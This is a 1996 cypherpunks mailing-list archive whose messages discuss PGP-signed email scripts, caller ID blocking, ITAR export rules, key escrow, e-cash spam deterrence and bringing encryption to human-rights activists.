        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mikhail A. Sokolov" <mishania@demos.su>
Date: Sun, 14 Jul 1996 11:01:47 +0800
To: AwakenToMe@aol.com
Subject: Re: Internet Relay Chat
In-Reply-To: <960713143834_433497999@emout14.mail.aol.com>
Message-ID: <199607132311.DAA09990@megillah.demos.su>
MIME-Version: 1.0
Content-Type: text


Everything you described is an abuse of administration mistakes and has
nothing to do with hacking (?) an irc/ircd. There are numerous patches
to prevent it.
As for "hacking irc" -- it is pretty indefinete what could it be...
Intruding to machine which is running an irc server isn't something new --
it is just a machine with an ircd running. Exploiting administration to hack
mistakes isn't anything new either -- there's lot's of idiotss abusing server's
code bugs, to say, +k bug to fight each other.
Anyhow, I do not thing this discussion has any future, as long as there's
nothing to discuss.

-mishania,

irc.ru administrator.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Carpenter <mcarpent@Dusk.obscure.net>
Date: Sun, 14 Jul 1996 22:03:59 +0800
To: markm@voicenet.com (Mark M.)
Subject: Re: Execution of signed scripts received by e-mail
In-Reply-To: <Pine.LNX.3.94.960713180741.2563A-100000@gak>
Message-ID: <199607141037.FAA01283@Dusk.obscure.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mark M. <markm@voicenet.com> writes:
> 
> On Sat, 13 Jul 1996, Steffen Zahn wrote:
> 
> > I suggest ignoring Reply-To: etc and requiring a return address inside
> > the signed region of the mail, otherwise someone could intercept the mail
> > (suppressing the original) and resend it from his account and the results
> > would get sent to the interceptor.
> 
> I agree.  Having a return address outside the signature allows for denial-o=
> f-
> service attacks and it would be trivial to intercept the output of the scri=
> pt.
> Definitely not a Good Thing.
> 
> >  Another idea would be to extract the return address from the PGP userid
> > which signed the script.
> 
> There are a couple of problems with this idea:
> 
> 	- The security of this scheme depends on trusting the user to sign her
> 	key.  If the user doesn't, than an attacker can intercept the user's
> 	key and alter the key ID.
> 
> 	- Even if the user does sign her key, there is still the problem of
> 	an attacker being able to generate a key with an identical key ID and
> 	and a different user ID.  If the attacker has the ability to intercept
> 	and modify messages, a MITM attack would be very effective.  If the
> 	key's fingerprint was included in the signed message, an MITM attack
> 	would be necessary to subvert the system.
> 
> If the key's fingerprint is included in the message, then it certainly woul=
> dn't
> take much more effort to put a return address in the signed body of the
> message.


Those are both very good ideas.  I'll have it require both the return
address and key fingerprint in the signed portion of the message.  

>
>-- Mark

Thanks for the suggestions.

- --Matt

- --
mcarpent@mailhost.tcs.tulane.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMejMPCjtJAMyBnp9AQFWhAf+PJkWptoICREg2a0Er6aHXPaNGzsERqad
dovSi5D8qByIzvr1ge0sjGxDAIaLXGjH4XMEAEjr+lZQI7jVa3f5wnGQRVneqbXB
sEI+Oh+3EnWut+hCAsr+PDIcRb1kLsp9v/rGhVxQkYhsLTJ55RDv5YYXVWxmB0ye
zfsuERnh6+V/q3FLs7UgAn7OjdpD3NiuFizUI4li4M03o3yT9dbecmkv0pvdeOV4
2GEHnX4WhZpmqviWHcqNkjmhcFN8hq0UHHm6oqVBW1qm/LjdHCHHZLaSHbwtIVHa
Bp39AxJfmTurwMosW3alxfWselCr6fUGBSQ7j9/REFAgt9aBxk4ISg==
=Ruc9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Carpenter <mcarpent@Dusk.obscure.net>
Date: Sun, 14 Jul 1996 21:59:45 +0800
To: zahn@berlin.snafu.de
Subject: Re: Execution of signed scripts received by e-mail
Message-ID: <199607141040.FAA01292@Dusk.obscure.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Steffen Zahn <zahn@berlin.snafu.de> writes:
>    Matt> Get one input line at a time, and look for Reply-To: and
>    att> From: headers to get a reply address.  As we are slurping up
>    Matt> lines, watch for '-----BEGIN PGP' lines.  If it is for
>
>I suggest ignoring Reply-To: etc and requiring a return address inside
>the signed region of the mail, otherwise someone could intercept the mail
>(suppressing the original) and resend it from his account and the results
>would get sent to the interceptor.

This is a very good suggestion.  I'll change emscrypt to use this.

> Another idea would be to extract the return address from the PGP userid
>which signed the script.

I see that Mark M. has already commented on this, but I'll also add that I
didn't want to limit the reply to the address attached to the key.  For
example, I have several accounts spread around, and I might want the replies
to go to anyone of them.

>Regards
>  Steffen

Thanks for the input.

- --Matt

- --
mcarpent@mailhost.tcs.tulane.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMejLASjtJAMyBnp9AQEWyAf+IgmEApjh7CGo+sdCueH9BPQKLb9Dk7Qj
1HK7HoR8Dz/TnDPLicJgiaYj9z8gDfGLYWu2L4UIDIgQukb3o1JWOshTQAgyoCe9
gYxTYHvroNqMvq3ptPeeY73NVGsyTZnlcYJ/dlhWT90jReCZmIcrbpJNt+TIgGcm
/s57Nw2zJzM8RrIWsCqs7gM0qogR2e71Gn4M+UFz9BfmMEw4X8qwZcD5M1//9VSi
TqDjWnVucuUoWVZk+Bb6lKcxPwlAx6BxUZLaNaZrPlqvrSYJS4l451vgWkpcixSy
Uuj+LU0cPd6qA3CHRHF4nllf3JcMP3uJeeWbmFjOZ+ItKkyQTSIVwQ==
=JIXQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Carpenter <mcarpent@Dusk.obscure.net>
Date: Sun, 14 Jul 1996 21:59:55 +0800
To: hfinney@shell.portal.com
Subject: Re:  Execution of signed scripts received by e-mail
Message-ID: <199607141042.FAA01300@Dusk.obscure.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal <hfinney@shell.portal.com> writes:
> 
> That sounds very impressive!  The one problem I've run into with mail
> filtering software is that each message asynchronously spawns a separate
> filter process.  This can cause some conflicts with accessing disk files.
> I haven't used procmail so I don't know if it has this problem.  But if
> so you may need to be careful if there are any cases where two processes
> could be accessing the same disk files.  For example, what if two copies
> of an identical email message arrive at almost the same time, would your
> dup detection work.

If I am reading the procmail docs correctly, then the following recipe
should create a lockfile called 'emscrypt.lock' which will prevent more than
one instance of the script from being run at a time

:0:emscrypt
^ Subject.*SQUEAMISH OSSIFRAGE
|/PATH/emscrypt

I agree it would be better if emscrypt used its own locks on the timestamp
files.  However, it is my understanding (someone please correct me if I am
wrong) that there is no simple way to provide file locking in Perl that is
portable across the various flavours of Unix (see the descriptions of the
fcntl and flock functions on p. 144-145 of the Camel book).  So I haven't
tried to implement locking from within emscrypt yet.  Of course, if these
functions are available on the majority of machines (anyone?) then I should
probably use them.

> The other issue is the possibility of mail arriving out of order.  Looking
> for increasing timestamps may cause spurious rejection of some messages.
> On the other hand this is a difficult problem to handle in general so
> probably the current solution is OK.

Yeah, I though about that too.  It can be somewhat alleviated by
batching the individually signed scripts into a single mail message, if 
you know you are going to be submitting several scripts close together 
in time.

Any other ideas?

> 
> Hal
> 

Thanks for the feedback.

- --Matt

- --
mcarpent@mailhost.tcs.tulane.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMejLIijtJAMyBnp9AQHnYgf6AkCfu7KLGKmJ6JNe0JscYkqWwHWGStFW
0u0dMrQekySy75iRqvyHJ789BhUj2gH5DhKBK97C0AhKj2jmv//7RALadqXOa73G
9nF31evxd+IItWaxeWbQQT9yNvEOz/bmLrz0bgH+GEwKHRFmUmwOObo4bw59M2bc
EianNNT0Ig4tOcVt6kaxWm79PylQvDvtIxy6e3g0wIyg0gUI9vzGSa7S1y9PAJSB
d60yJAfYKSEPGoab8fDbrTbJLMUfR1BYevdHrJxxCiuOj9uhIEfCnHua/P6k6tvP
ZIa8Bz3jilq+AE/+CzBezk0IJmq7MEMQFJHyk/1AtKwY58x6xxWxuQ==
=S64i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 14 Jul 1996 19:12:30 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.LNX.3.93.960711231901.174F-100000@smoke.suba.com>
Message-ID: <Pine.LNX.3.94.960714054823.1658A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 11 Jul 1996, snow wrote:

> Date: Thu, 11 Jul 1996 23:19:37 -0500 (CDT)
> From: snow <snow@smoke.suba.com>
> To: "Perry E. Metzger" <perry@piermont.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [RANT] Giving Mind Control Drugs to Children 
> 
> On Fri, 12 Jul 1996, Perry E. Metzger wrote:
> 
> > snow writes:
> > > On Wed, 10 Jul 1996, Perry E. Metzger wrote:
> > > > "Clay Olbon II" writes:
> > > > > While it is crucial for an adult to be able to function and maintain a jo
> > b,
> > > > > is it really as important for a kid to be able to sit still in school?  
> > > > If he or she is going to learn anything, it is important to be able to
> > > > pay attention, yes.
> > > If they were teaching anything, I bet the kid _would_ sit still. 
> > I doubt it.
> 
>      Let me put that another way. Be much more attentive.
> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@crash.suba.com
> 
> 

Personally, being one of the aformentioned un-attentive students, must
agree.  If the subject is taught well, and the class is interesting, the
student will pay attention.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeiKhzAJap8fyDMVAQGmHgf+MCSvK2OsUAmMh9I1/5LHtMuNmPuKzco7
ChJQRwCDxKUR/YEgA6t/Mk6ijKTfswF90GKis5CO0a+rESmlTQkX7BYRdWBfcD8A
yo7W5BORo2CHgBhwDOtBE3z8WDlu6a94Kfgb1EJF3qE5sqxb9JKlgOfKtXLCL78r
bx7Uzplz1EN84guvRC2X1PJxbWXpKQbESeiV/+UbcT0Yhdswc2S2CL7PvQ8fiPJ9
GjEb/JlwWF4L+pLBDnf/XZBAXkmf4+JcIHZkoQZi4Kosvcuo9u3nHmiD09IaCIYV
Gux1WDeNnBejp/eTSqQY4d/OzuH2wJ3xudQlBBHeaTQnqaXLLlgdKQ==
=sF9Q
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Timothy Lawrence Nali <tn0s+@andrew.cmu.edu>
Date: Sun, 14 Jul 1996 21:39:10 +0800
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
In-Reply-To: <Pine.OSF.3.91.960714123249.32693A-100000@giasdl01.vsnl.net.in>
Message-ID: <oluAERy00iWTQ0u2Zy@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 14-Jul-96 Re: ANNOUNCEMENT: PGPfone
B.. by Arun Mehta@giasdl01.vsnl 
> Thanks for the input.
>  
> Is UDP used for other purposes not related to voice that I might pretend 
> to be doing? Or is there still some way of fooling them?

One thing that comes to mind are network games.  I not sure if Doom or
Quake can use UDP, but I'm fairly certain that Netrek uses UDP packets
(up to 16 players run client programs which communicate with a game
server using TCP or UDP).




_____________________________________________________________________________
 
 Tim Nali            \  "We are the music makers, and we are the dreamers of
 tn0s@andrew.cmu.edu  \   the dreams" -Willy Wonka and the Chocolate Factory






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagtje.cs.colorado.edu>
Date: Sun, 14 Jul 1996 23:36:04 +0800
To: cypherpunks@toad.com
Subject: e-mail spam solution by Bryce Re: ADMIN: Please ignore HLD publishing
In-Reply-To: <cola-liw-837245733-6912-0@liw.clinet.fi>
Message-ID: <199607141226.GAA17430@nagtje.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[this is an e-mail reply to a Usenet post, carbon-copied to
cypherpunks list.]


In comp.os.linux.announce you, Lars Wirzenius <liw@iki.fi>, wrote:
>
>Meanwhile, I'm beginning to feel rather annoyed by the general spam
>problem, especially e-mail spam.


Me too.


> During the worst days, about half of my non-mailing-list mail is spam.
> I am in the process of installing a filter that will make it more 
> difficult to reach me via e-mail.  I am going to require strangers to 
> use a password in the subject line to reach me (people I know will be 
> put onto a whitelist).  It will be easy to get the password, but 
> I doubt that spammers will bother.  This filtering is not in effect 
> yet.  I'll inform you when it is.


I have a great idea for an upgrade to your filter, for that
fateful day when spammers start using your password:


Have your filter reject any incoming mail which is not 1) from
one of your white-listed friends or 2) accompanied by a one U.S.
Dollar "good faith" deposit.  Spammers will not find it
worthwhile to send unwanted mail, because it costs them one
dollar each time.  But people who sincerely have interesting
information for you, even if they are not people on your
whitelist, can send the one dollar "good faith" deposit with a
good chance that you will give the money back to them once you
have read their letter.


Just another example of how Ecash(tm) is going to improve the
Net.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: www.c2.net/~bryce -- 'BAP' Easy-PGP v1.1b2

iQCVAwUBMejncPWZSllhfG25AQEypAQAkiC1O4nab+aLMo6v3stbHUm/VLtHo+lC
kIOD+UU+ckc4/vHEMLWgT4LfQ2EH338GxOkA7zgcBe9nhcBxIqvlqU5BurmLie/X
j7xXFcQTzf+D+fIaD3xBjQrs/g2oOwqiGrCKCkEf3MWzYu1J7Bw1W458vjziizyu
+Q8VBY6cVV0=
=nRLB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 14 Jul 1996 20:49:16 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Minitel "saved" by hackers?
In-Reply-To: <199607121211.IAA25706@unix.asb.com>
Message-ID: <Pine.LNX.3.94.960714073235.7387B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jul 1996, Deranged Mutant wrote:

> Date: Fri, 12 Jul 1996 07:55:12 +0000
> From: Deranged Mutant <WlkngOwl@unix.asb.com>
> To: Daniel Salber <daniel.salber@imag.fr>
> Cc: cypherpunks@toad.com
> Subject: Re: Minitel "saved" by hackers?
> 
> On 12 Jul 96 at 5:51, Daniel Salber wrote:
> [..]
> > As Minow pointed out, this is not the only case of "hijacking". The
> > telephone was first intended as a way to listen to remote concerts. Then
> > users found out they could use it for one-to-one conversations.
> 
> This is innacurate. No, methinks it's wrong.  From every history of 
> telephones I have read and heard, it was never that way.
> 
> The original conception was of using the telephone for broadcasting. 
> It's implementation in most countries was for point-to-point 
> communication... it wasn't a matter of the users 'found they could 
> use it' (at least not in the US).
> 
[SIG skipped]

Umm.. check again... Bell origonally conceived the telephone as a means of
broadband communication, like radio is today.  Bruce Sterling explains
this exceptionally well in his book "The Hacker Crackdown" (Nonfiction)

 -- Deviant

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeijDjAJap8fyDMVAQHObQf+IKVX42WUmnareinWeKoYtvuSXG3+8gB7
+wmxyXkKc6Qs7Xgi7N3PMlLqkdnZhI/Q1JxQmj2FshwvMN1gsVeP3ZUnADrjCJXw
JR6JvXggchkWUR4lANVE8LUmktdcdtmiCPile9fpj5BF07Yi0z9mAesLxnk1SZWm
+M7dYvUgByDjF0QuiEjGu0yTNxHWf9MTZlDkGmFZGgn9oUXalPNHJKcm7Vmg1i5J
I5zFcaG3EnvLSPsLw6rh9HK93QAjeRxnCjKdiCdznp8QjeF8R8Mq1yFidxcEaplO
JW3yx8PASUhAtqDXfte5QT85iqzOehauWQrnDxMqIR+4hN2/r8krhQ==
=1Tzv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 14 Jul 1996 20:49:23 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121854.LAA29560@slack.lne.com>
Message-ID: <Pine.LNX.3.94.960714074238.7387C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jul 1996, Eric Murray wrote:

> > They said no problem, but...  They said nothing I can do will block it
> > when I call 800 numbers.  "The people with 800 numbers have special
> > software, and there is nothing you can do to block your identity when
> > calling them.  Not even *67."
> 
> Same in Pacific Bell land.  We get two options- "partial blocking"
> which really means tht you have to use *67 to block CID to
> non-800/900 numbers, and "complete blocking" which blocks CID
> to non-800/900 numbers.
> 
> When I called the Pac Bell customer service droids to get my "complete"
> blocking I asked them why they won't block CID to 800 numbers.
> Their answer: "that's just the way it works". 
> 

It has been this way since the advent of electronic switching, and it will
always be this way.  800/888/900 numbers get ANI, which is, basicly, the
same way 911 knows who you are.  While not exactly identical to E911, they
are strikingly similar.  I beleive that somebody else has, correctly,
suggested that if you wish to know more about this sort of thing, read the
alt.2600 FAQ.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeilvTAJap8fyDMVAQEfSAf+PrrTzw0hOWC2TlPO2eXfQXLfwFs+kDwn
DIb7GH1wby3t7vmc91QITi0mR4GybCX3HZTXaNJ+MzqWEcjhC6gCK3zAwmtIrUtE
0hcE1qM06O2JdQcPTjhZEf483a5NK88bczTpMXRXeAayFHERgOnVUr7hfHwSaahA
ZBkPBhCf0jQHsImLyAMcwuNsLdvZbiCtcNAYDYNtEQv9XhLCH7smNkVCfW/OzYd2
7N2RUe9lTmc+fzeoTQSYlXuWVg510lVUIoMl/uuWq+6R3J9bfmjbjHos1Nay8b4+
ugih/0LetvhG41CLFTHiMPqchL5Fh6sjVNpT6axCnZ1yA29q/9KGGQ==
=uuvK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: weffross@counsel.com (Walter A Effross -- American Univ. - Washington )
Date: Sun, 14 Jul 1996 23:12:04 +0800
To: cypherpunks@toad.com
Subject: Call for Papers
Message-ID: <9607141157.AA08978@ad0.reach.com>
MIME-Version: 1.0
Content-Type: text/plain



        The American University Law Review encourages submissions
for possible publication in its upcoming Symposium Issue on The
Electronic Future of Cash.  American University's Washington
College of Law is now planning a full-day conference to accompany
the publication of this issue in the Spring of 1997.

        Topics of interest include, but are not limited to:

        -- Consumer Protection.  The relative advantages and
disadvantages to consumers of debit cards, smart cards, on-line
cash accounts, electronic checks, digital scrip, and other forms
of electronic payment for "cash" transactions ("Electronic Cash"),
especially as contrasted with payment by cash, paper checks, and
credit cards.  The current or potential application of consumer
protection statutes and regulations to forms of Electronic Cash.

        -- Uniform Commercial Code.  The extent to which the UCC
and associated regulations already cover, or should be extended or
modified to cover, Electronic Cash.

        -- "E-Bank" Regulation.  The regulation of issuers of
Electronic Cash.

        -- Criminality.  The applicability and creation of laws
concerning crimes (counterfeiting, money-laundering, electronic
ransom payments, etc.) involving Electronic Cash.

        -- Privacy, Encryption, and Anonymity.  The extent to
which the privacy of merchants and consumers engaging in
transactions with Electronic Cash can and should be legally
protected.

        -- Security Concerns.  Legal issues involving the
protection of Electronic Cash systems from hackers, fraudulent
participants, and other security threats.

        -- Microtransactions.  Legal issues concerning the
implementation and regulation of on-line systems that involve
payments of small amounts of Electronic Cash by consumers to
service or content providers.

        -- Interstate and International Aspects.  (e.g.,
Jurisdiction, Choice of Law, Taxation).

        -- Role of the Federal Government.  Should the Government
be setting the ground rules for competition among systems and
varieties of Electronic Cash?  Selecting one or more systems for
national implementation?  Or just allowing the market to decide?

        Submissions should be approximately 100 double-spaced
pages in length, written in traditional law review format with
sufficient footnotes and documentation.  Citations should conform
to The Bluebook: A Uniform System of Citation (15th ed.1991).
        Papers should be received by The Law Review by October 1,
1996, and will be selected within two weeks of this deadline.
Authors of papers accepted for publication will be expected to
confirm within seven days after acceptance their agreement to
contribute these papers to the Symposium Issue.
        Submissions should be made in hard copy to: The American
University Law Review/Electronic Cash Symposium, Heather J.
Russell/Senior Articles Editor, Washington College of Law, 4801
Massachusetts Avenue, N.W., Suite 617, Washington, DC  20016.
        Questions can be addressed to Professor Walter A. Effross,
[voice] (202) 274-4210, [fax] (202) 274-4130, [e-mail]
weffross@counsel.com.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 15 Jul 1996 00:05:37 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Correction Re: Can the inevitability of Software privacy be used . . .
In-Reply-To: <199607131808.OAA10339@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199607141249.IAA15965@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:

: : The ITAR do NOT apply to books.
: 
: The only trouble with this claim is that it does not conform to the
: language of the ITAR or with the whimsical practices of the Office of
: Defense Trade Controls.  There is no exception for books, except for
: those that are in the public domain because they are sold in book stores
: and at newstands or are found in libraries, and the ODT insists that one
: cannot put a book into the public domain by putting it into the public
: domain or by selling it in a bookstore.

Whereas I meant to say:

: cannot put a book into the public domain by putting it into _a 
: library_ or by selling it in a bookstore.

I hope that this did not cause any confusion.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 15 Jul 1996 01:25:25 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.LNX.3.94.960714074238.7387C-100000@switch.sp.org>
Message-ID: <Pine.LNX.3.91.960714094635.9973A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


     The reason that caller ID cannot be blocked to 800 and 900 numbers 
is that it is used for billing purposes by the telephone company to the 
person or business who owns that 900 or 800 number. EX:  L.L.Bean ( 
alarge mailorder sporting goods store in Freeport,Maine) gets thousands 
of calls from their clientele around the country.The 800s because they 
are not charged to the person calling the L.L.Bean must be charged to 
someone to pay the expenses of running the telephone equiptment and the 
profits going to the stckholders so who pays ? The businesses pay. A way 
must be found to figure out what they owe and the only way to do that is 
to keep records. They records as they stand now include the phone number 
from which they were dialed and the length of the call. My phone call to 
them from Scranton ,Pa will cost the L.L.Bean less then Tim Mays from 
California because I am closer. That is unless I perhaps have a package 
missing and need to stay on the customer service line for twenty minutes 
or longer when he just placed an order and got off in under five.
     THe phone company looks at the L.L.Bean phone records and send them 
a bill that includes how much it cost me to make that phone call to them 
to find out if the package got lost and Tim's to order that wheelbarrow 
and all the other callers. Each caller will have cost the L.L.Bean a 
different amount of money. The telephone number on the reords. It can be 
used to track down teenage hackers who want to upgrade their disk 
drives(Bean has none) and other stuff too dependent upon the size of the 
company (not Bean)and the integrity of the employees. It could 
conceivably be used by an unscrupulous employee from Sadie's S and M to 
blackmail someone or the whole clientele list. This is unforunate.
      What could concevably be done is that the software could be 
reprogrammed to delete the phone number immediatley after the 
computation. Or to have the computation done immediately and deltion to 
accompany it. third, the phone company could reprogram it so the mileage 
and time is computed somhow without the logging of the caller. All of 
this has to do computer programming and I find none of the aforementioned 
an impossibility to achieve.
                         moroni

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 15 Jul 1996 04:55:16 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
In-Reply-To: <199607131822.OAA13918@unix.asb.com>
Message-ID: <v03007603ae0edb4552d1@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:05 AM -0700 7/13/96, Deranged Mutant wrote:
>On 12 Jul 96 at 18:23, Bob Palacios posted:
>
>[Banner Snipped!]]
>>  CDT POLICY POST Volume 2, Number 27                        July 12, 1996
>[..]
>
>> Today's statement is essentially a re-statement of the Clipper III proposal
>> released in May.  Among other things, the Vice President:
>>
>> *  Called for the liberalization of export controls provided computer
>>    users participate in a "global key management infrastructure"
>>    designed to make personal encryption keys accessible to law
>>    enforcement.
>
>This is particularly problematic... if the mainland Chinese gov't
>requested a key from a N.Amercian or European (or even UN controlled)
>escrow agency, who is to say it isn't really for political reasons
>(even though they may claim the persons are drug smugglers)?
>
>Or what if the 'crime' was, say, discussing Mormon beliefs, which is
>illegal in Singapore (and I think Russia as well)?
>
>Or what if some terrorist was using keys escrowed in a country that
>sponsered terrorist acts?

Your best shot would be to make sure the part about the system being
voluntary was hard-wired into any legislation or rule-making. Unless and
until ITAR is modified by Congress, the USG has what Mark Twain called "the
calm confidence of a Christian with four aces" on this matter. That
is--unless and until Congress acts, the Administration has absolute
discretion with respect to the conditions under which they will liberalize
the administration of ITAR.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 15 Jul 1996 05:13:54 +0800
To: "Peter D. Junger" <cypherpunks@toad.com>
Subject: Re: Correction Re: Can the inevitability of Software privacy beused . . .
In-Reply-To: <199607131808.OAA10339@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <v03007604ae0ede6b1022@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713593.multipart/signed"

--Boundary..3943.1071713593.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

At 5:49 AM -0700 7/14/96, Peter D. Junger wrote:
>I wrote:
>
>: : The ITAR do NOT apply to books.
>:
>: The only trouble with this claim is that it does not conform to the
>: language of the ITAR or with the whimsical practices of the Office of
>: Defense Trade Controls.  There is no exception for books, except for
>: those that are in the public domain because they are sold in book stores
>: and at newstands or are found in libraries, and the ODT insists that one
>: cannot put a book into the public domain by putting it into the public
>: domain or by selling it in a bookstore.
>
>Whereas I meant to say:
>
>: cannot put a book into the public domain by putting it into _a
>: library_ or by selling it in a bookstore.
>
>I hope that this did not cause any confusion.

Let's see if I understood what you said. Is "a" the operative word--that
is, are you telling us that a book is in the public domain if it is widely
sold in bookstores or held in libraries, but that you can't put it in the
public domain by selling it in one bookstore or depositing it in one
library?

If so how many are enough? If not, please clarify further.

Thanks;
David



--Boundary..3943.1071713593.multipart/signed
Content-Type: application/octet-stream; name="pgp00003.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00003.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VBTWVrdVlVd2dIK05ZclE4MUFRR2lLQVA5SFh1ZkNJMmVrTmZl
dlJBcm8vczJnVko2NnRZUlhjQS8Kb1l2YXM1SHJ2TlVlN0ppQTk4bmV4cDdi
b2xSVTdsSTZtNFNPTmdpV1d1STNNQzAwWFIwenB2VHJDcmIrM2Q3UQozdXNt
T21qUExVOGRjSlpYUGhVdVFMNStJR2RwbXkvOHVmZVlPc3gyVmZmSjIxWlYy
bTB5RVFZeEx4RHBTUjlXCnBnNnJ3em95aUUwPQo9WnBMTgotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713593.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 14 Jul 1996 19:26:26 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Crypto-activism
Message-ID: <1.5.4.32.19960714113349.002f054c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 00:43 13/07/96 +0000, Deranged Mutant wrote:
>My point is that a lot of people in those countries are aware of PGP 
>etc. than make it out to be.  Certainly many activists are.  They 
>focus on the human rights issues at hand, to which PGP etc. may be a 
>tool... but isn't the central focus.

I agree. But many such people, who need PGP but don't want to make it their
central focus, have a hard time acquiring the necessary skills. When even
people on this list, for whom by and large crypto is the central focus,
complain about how cumbersome PGP is to use in practice, what about everyone
else?

>
>It would be condescending to email to many people in a domain saying 
>"hey, have you heard of PGP?..."  Chances are they'll think it's a 
>strange commercial spam anyway.

You are right, and it wasn't my suggestion to ask in this way. What one
could do is:
1) Prepare a writeup in simple English, on exactly how to use the
appropriate software.
2) Try to get it translated into Chinese, Korean, and whatever other
language we can find volunteers or sponsorship for.
3) Post on appropriate newsgroups that such translations exist, with urls.
4) Suggest that since people living under authoritarian regimes may not have
access to the appropriate Usenet newsgroups, to please spread the word. No
need to suggest that any particular country is being targetted, in fact
enough people living in the US and using the office computer for
communications would benefit.

>> the question is,  are
>> *you* in a position to share your knowledge?
>
>Yep.  But there's a proper way to share knowledge.  

Would you agree that steps 1-4 above would constitute the proper way? In
that case, would you help prepare such a document (any other volunteers
equally welcome)?

>You also have to know what you're talking about: if you're not familiar
>with the nitty -gritty of politics in such countries, you'll come off as the 
>"cypherpunk bearing gifts of crypto for the natives"... the politics 
>going on in places like Cuba, China, Iraq, Russia are a bit more 
>complex than what comes off through the media (to some extent no 
>matter where you are and what media you watch).

Undoubtedly. But I see no problem in cypherpunks bearing gifts of crypto to
people who are fighting difficult battles for human rights -- ultimately for
all of us. If anyone is bearing gifts here, it is them. On the Internet,
everyone does what s/he is good at, and cypherpunks just happen to be good
at crypto.

>
